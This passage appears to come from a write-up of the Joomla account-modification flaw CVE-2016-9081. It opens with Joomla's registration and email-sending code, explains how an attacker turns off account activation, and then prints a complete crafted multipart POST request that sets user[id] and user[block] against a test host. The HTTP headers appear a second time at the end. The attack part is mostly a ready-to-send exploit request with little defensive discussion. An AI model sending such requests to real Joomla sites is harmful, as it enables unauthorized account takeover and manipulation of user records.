 $data['sitename'],
 $data['activate'],
 $data['siteurl'],
 $data['username']
 );
 }
 }
 elseif ($useractivation == 1)
 {
 // Set the link to activate the user account.
 $uri = JUri::getInstance();
 $base = $uri->toString(array('scheme', 'user', 'pass', 'host', 'port'));
 $data['activate'] = $base . JRoute::_('index.php?option=com_users&task=registration.activate&token=' . $data['activation'], false);

 // Remove administrator/ from activate url in case this method is called from admin
 if (JFactory::getApplication()->isAdmin())
 {
 $adminPos = strrpos($data['activate'], 'administrator/');
 $data['activate'] = substr_replace($data['activate'], '', $adminPos, 14);
 }

 $emailSubject = JText::sprintf(
 'COM_USERS_EMAIL_ACCOUNT_DETAILS',
 $data['name'],
 $data['sitename']
 );

 if ($sendpassword)
 {
 $emailBody = JText::sprintf(
 'COM_USERS_EMAIL_REGISTERED_WITH_ACTIVATION_BODY',
 $data['name'],
 $data['sitename'],
 $data['activate'],
 $data['siteurl'],
 $data['username'],
 $data['password_clear']
 );
 }
 else
 {
 $emailBody = JText::sprintf(
 'COM_USERS_EMAIL_REGISTERED_WITH_ACTIVATION_BODY_NOPW',
 $data['name'],
 $data['sitename'],
 $data['activate'],
 $data['siteurl'],
 $data['username']
 );
 }
 }
 else
 {
 $emailSubject = JText::sprintf(
 'COM_USERS_EMAIL_ACCOUNT_DETAILS',
 $data['name'],
 $data['sitename']
 );

 if ($sendpassword)
 {
 $emailBody = JText::sprintf(
 'COM_USERS_EMAIL_REGISTERED_BODY',
 $data['name'],
 $data['sitename'],
 $data['siteurl'],
 $data['username'],
 $data['password_clear']
 );
 }
 else
 {
 $emailBody = JText::sprintf(
 'COM_USERS_EMAIL_REGISTERED_BODY_NOPW',
 $data['name'],
 $data['sitename'],
 $data['siteurl']
 );
 }
 }

 // Send the registration email.
 $return = JFactory::getMailer()->sendMail($data['mailfrom'], $data['fromname'], $data['email'], $emailSubject, $emailBody);

 // Send Notification mail to administrators
 if (($params->get('useractivation') < 2) && ($params->get('mail_to_admin') == 1))
 {
 $emailSubject = JText::sprintf(
 'COM_USERS_EMAIL_ACCOUNT_DETAILS',
 $data['name'],
 $data['sitename']
 );

 $emailBodyAdmin = JText::sprintf(
 'COM_USERS_EMAIL_REGISTERED_NOTIFICATION_TO_ADMIN_BODY',
 $data['name'],
 $data['username'],
 $data['siteurl']
 );

 // Get all admin users
 $query->clear()
 ->select($db->quoteName(array('name', 'email', 'sendEmail')))
 ->from($db->quoteName('#__users'))
 ->where($db->quoteName('sendEmail') . ' = ' . 1);

 $db->setQuery($query);

 try
 {
 $rows = $db->loadObjectList();
 }
 catch (RuntimeException $e)
 {
 $this->setError(JText::sprintf('COM_USERS_DATABASE_ERROR', $e->getMessage()), 500);

 return false;
 }

 // Send mail to all superadministrators id
 foreach ($rows as $row)
 {
 $return = JFactory::getMailer()->sendMail($data['mailfrom'], $data['fromname'], $row->email, $emailSubject, $emailBodyAdmin);

 // Check for an error.
 if ($return !== true)
 {
 $this->setError(JText::_('COM_USERS_REGISTRATION_ACTIVATION_NOTIFY_SEND_MAIL_FAILED'));

 return false;
 }
 }
 }

 // Check for an error.
 if ($return !== true)
 {
 $this->setError(JText::_('COM_USERS_REGISTRATION_SEND_MAIL_FAILED'));

 // Send a system message to administrators receiving system mails
 $db = $this->getDbo();
 $query->clear()
 ->select($db->quoteName(array('name', 'email', 'sendEmail', 'id')))
 ->from($db->quoteName('#__users'))
 ->where($db->quoteName('block') . ' = ' . (int) 0)
 ->where($db->quoteName('sendEmail') . ' = ' . (int) 1);
 $db->setQuery($query);

 try
 {
 $sendEmail = $db->loadColumn();
 }
 catch (RuntimeException $e)
 {
 $this->setError(JText::sprintf('COM_USERS_DATABASE_ERROR', $e->getMessage()), 500);

 return false;
 }

 if (count($sendEmail) > 0)
 {
 $jdate = new JDate;

 // Build the query to add the messages
 foreach ($sendEmail as $userid)
 {
 $values = array(
 $db->quote($userid),
 $db->quote($userid),
 $db->quote($jdate->toSql()),
 $db->quote(JText::_('COM_USERS_MAIL_SEND_FAILURE_SUBJECT')),
 $db->quote(JText::sprintf('COM_USERS_MAIL_SEND_FAILURE_BODY', $return, $data['username']))
 );
 $query->clear()
 ->insert($db->quoteName('#__messages'))
 ->columns($db->quoteName(array('user_id_from', 'user_id_to', 'date_time', 'subject', 'message')))
 ->values(implode(',', $values));
 $db->setQuery($query);

 try
 {
 $db->execute();
 }
 catch (RuntimeException $e)
 {
 $this->setError(JText::sprintf('COM_USERS_DATABASE_ERROR', $e->getMessage()), 500);

 return false;
 }
 }
 }

 return false;
 }

 if ($useractivation == 1)
 {
 return "useractivate";
 }
 elseif ($useractivation == 2)
 {
 return "adminactivate";
 }
 else
 {
 return $user->id;
 }
 }
}

398

399

400

401

402

403

404

405

406

$useractivation = $params->get('useractivation');

$sendpassword = $params->get('sendpassword', 1);

// Check if the user needs to activate their account.

if (($useractivation == 1) || ($useractivation == 2))

{

$data['activation'] = JApplicationHelper::getHash(JUserHelper::genRandomPassword());

$data['block'] = 1;

}

Variable $useractivation is reading from Joomla settings and our newly created admin can change it. Go to user registration settings and set New User Account Activation option to None.

After that, you can add user[block] to POST request for change user data and send it for successful exploitation of CVE-2016-9081 issue.

POST /index.php/component/users/ HTTP/1.1
Host: joomla.local
Cache-Control: max-age=0
Origin: http://joomla.local
User-Agent: PipBoy 3000
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryefGhagtDbsLTW5qI
Accept: */*
Referer: http://joomla.local/index.php/author-login
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: 82dbfb3ecd170841cef1b1d02107f92f=k112r9p4i096emdut3trb0s8a0;
Connection: close

------WebKitFormBoundaryefGhagtDbsLTW5qI
Content-Disposition: form-data; name="user[id]"

506
------WebKitFormBoundaryefGhagtDbsLTW5qI
Content-Disposition: form-data; name="user[block]"

0
------WebKitFormBoundaryefGhagtDbsLTW5qI
Content-Disposition: form-data; name="user[groups][]"


------WebKitFormBoundaryefGhagtDbsLTW5qI
Content-Disposition: form-data; name="user[name]"

pes
------WebKitFormBoundaryefGhagtDbsLTW5qI
Content-Disposition: form-data; name="user[username]"

dog
------WebKitFormBoundaryefGhagtDbsLTW5qI
Content-Disposition: form-data; name="user[password1]"

q1w2e3
------WebKitFormBoundaryefGhagtDbsLTW5qI
Content-Disposition: form-data; name="user[password2]"

q1w2e3
------WebKitFormBoundaryefGhagtDbsLTW5qI
Content-Disposition: form-data; name="user[email1]"

dog@pes.com
------WebKitFormBoundaryefGhagtDbsLTW5qI
Content-Disposition: form-data; name="user[email2]"

dog@pes.com
------WebKitFormBoundaryefGhagtDbsLTW5qI
Content-Disposition: form-data; name="option"

com_users
------WebKitFormBoundaryefGhagtDbsLTW5qI
Content-Disposition: form-data; name="task"

user.register
------WebKitFormBoundaryefGhagtDbsLTW5qI
Content-Disposition: form-data; name="4433b98ad230b93c90d26e79d81d9079"

1
------WebKitFormBoundaryefGhagtDbsLTW5qI--

POST /index.php/component/users/ HTTP/1.1

Host: joomla.local

Cache-Control: max-age=0

Origin: http://joomla.local

User-Agent: PipBoy 3000

Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryefGhagtDbsLTW5qI

Accept: */*

Referer: http://joomla.local/index.php/author-login

Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.8

Cookie: 82dbfb3ecd170841cef1b1d02107f92f=k112r9p4i096emdut3trb0s8a0;

Connection: close